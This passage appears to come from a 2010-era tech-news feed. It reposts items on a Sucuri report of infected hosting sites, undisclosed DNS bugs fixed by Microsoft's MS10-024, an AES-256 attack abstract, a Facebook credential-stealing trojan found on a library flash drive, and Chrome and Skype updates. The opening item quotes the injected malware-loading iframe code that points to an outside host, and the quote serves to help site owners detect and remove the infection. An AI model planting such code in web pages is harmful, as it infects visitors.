phone"; else $os = "Unknown OS :(";At the end both show the same iframe to load malware: document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://grepad.com/in.cgi?2"; this.height=0; this.width=0;} \'If you got infected, look at your php.ini or .htaccess file and remove the bad entries. If you are not sure, use our scanner to check it out. Sucuri Security: New infections today at Network Solutions

You've never seen data presented like this. With the drama and urgency of a sportscaster, statistics guru Hans Rosling debunks myths about the so-called "developing world." Hans Rosling shows the best stats you've ever seen | Video on TED.com //stiu ca e vechi filmuletul, dar merita vizionat, abia azi l-am descoperit.

A recent security patch from Microsoft silently fixed two severe bugs that were never disclosed even though they posed a risk to many of its customers, a security researcher said. MS10-024 fixed two flaws that made it possible for adversaries to intercept victims' email messages sent by Exchange and Windows SMTP service, Nicolás Economou, a researcher with Core Security said. But the bugs - which made it "trivial" to spoof responses to domain name system queries - weren't disclosed and were never assigned a Common Vulnerabilities and Exposure identifier, sparking criticism that the critical bugs weren't properly disclosed. Instead, the Microsoft bulletin referred only to a denial of service vulnerability that was rated either "important" or "moderate." By underplaying the risk of the threats being fixed, MS10-024 didn't give IT admins adequate information in deciding when, or if, to install the patch, Core said. "These vulnerabilities were fixed by the patches referenced in MS10-024 but were not disclosed in the vendor's security bulletin and did not have a unique vulnerability identifier assigned to them," the Core advisory stated. "As a result, the guidance and the assessment of risk derived from reading the vendor's security bulletin may overlook or misrepresent actual threat scenarios." A Microsoft spokesman said researchers were investigating the report and would respond when their inquiry was completed. Core described the undisclosed vulnerabilities as "two severe bugs" residing in both Microsoft Exchange and the SMTP services included in the 2000, XP, 2003, and 2008 versions of Windows. They made it "trivial" for attackers to pull off DNS cache–poisoning attacks first described in the early 1990s and made famous two years ago by researcher Dan Kaminsky. One of the bugs causes vulnerable versions of Exchange and Windows to generate DNS queries using incremental transaction ID numbers. That made it easy for malicious DNS servers to guess the values and send fraudulent responses. A second flaw failed to verify that the value of the ID field in a DNS response matched the corresponding DNS query packet previously sent. Machines that installed the patch, which was released last month, have been purged of both bugs, but users would have no way of knowing that from the bulletin that accompanied it. Indeed, the only hint of a fix comes in a FAQ section that said: "This update also includes a defense-in-depth change for Microsoft Exchange 2007 and Microsoft Exchange 2010 that adds additional source port entropy to DNS transactions initiated by the SMTP service." Core criticized that disclosure, saying source port entropy isn't the same thing as the value of the transaction ID field used in outbound DNS queries. It also said verification of ID responses is mandated by section 9.1 of RFC5452. "Core does not consider the two bugs reported to be 'security-in-depth' fixes and points out that there is an amount of literature to support that opinion starting with Core's first published security advisory on DNS query ID prediction and ending with Dan Kaminsky's over-publicized DNS poisoning technique which in 2008 Microsoft considered bonafide bugs that required public disclosure using their own CVEs as disclosed in MS08-037," it said. More information and commentary from the Breaking Code blog is here. Microsoft update secretly fixed two 'severe' bugs ? The Register

Cryptology ePrint Archive: Report 2010/257 Feasible Attack on the 13-round AES-256 Alex Biryukov and Dmitry Khovratovich Abstract: In this note we present the first attack with feasible complexity on the 13-round AES-256. The attack runs in the related-subkey scenario with four related keys, in 2^{76} time, data, and memory. Cryptology ePrint Archive: Report 2010/257

Google claims the latest beta of its Chrome browser is a third faster than the previous release. The claimed improvement is based on V8 and SunSpider benchmarks. Other benefits include the ability to synchronise bookmarks and browser preferences on different machines via your Google account. Developers said they'd bowed to popular demand by allowing the installation and use of Chrome extensions in porn mode incognito mode. It also supports parts of HTML5 like Geolocation APIs and App Cache. There are versions of the beta to run on Mac, Linux or Windows machines. More from Google here Latest Chrome beta fastest ever - again ? The Register

When you use a computer other than your own, you have to be especially careful about what online accounts you access - particularly if the computer in question is in a library or an Internet cafe, where a lot of people can use it without raising suspicion and without having to give their personal information to do it. A recent episode that a Sunbelt researcher was the protagonist of demonstrates how easily your Facebook account credentials can be stolen. He was at his local library and noticed that one of the computers available for use had a flash drive sticking out of its ports. His curiosity aroused, he sat down and checked the contents of the drive and found an executable that sports an icon similar to the original Facebook logo and purports to be a "FaceBook Remote Viewer" that allows you to visit Facebook from school or work by avoiding firewalls. When executed, the user is faced with this screen: As the program loads, a website with a (grammatically flawed) description also loads in the background, as a way to defuse any skepticism that the user might have. The program eventually asks the user to enter his or hers name, email and Facebook password, and seemingly proceeds with the log-in and loading process, but "fails" and shows the following screen: Of course, the firewall is not the problem - the program wasn't designed to allow you to access Facebook. It is a information-stealing Trojan that collects your credentials, which are now conveniently stored in a .txt file placed on the flash drive. The only thing left for the thief to do is to collect the drive and misuse the credentials. Demonstration of Facebook account credentials theft

ai butonul edit. editeaza frumos postul. ce commenturi vrei ? e vechi programul.

(AP) -- Internet calling service Skype plans a public "beta" test of a group video chat function that lets up to five people participate in a video call simultaneously. When the feature launches next week it will be free, but Skype Ltd. plans to start charging for it along with some other upcoming features in three or four months, said Neil Stevens, general manager of Skype's consumer business segment. Skype's software already offers a range of free services, including the ability to make voice or video calls and send instant messages to other Skype users. Users pay for services such as making calls from a PC to a landline or cell phone. Stevens said group video chat will first be available to those who use Skype on Windows PCs, and the company expects to roll out a Mac version later this year. Stevens said the feature is the one users have requested most. Skype, which was sold late last year by eBay Inc. for about $2 billion to an investor group that includes Skype's founders, is also expanding its monthly subscription offerings to include calls to both cell phones and landlines in more than 170 countries. The company's existing subscription plans include one that allows calls to more than 40 countries, but they focus mostly on calls to landlines. That is generally cheaper for the company than routing calls from the Internet to cell phones. On Wednesday, Skype plans to unveil new subscriptions that let users choose which countries they want to call and whether they want to call landlines and cell phones or just one of the two. Skype to unveil group video chat function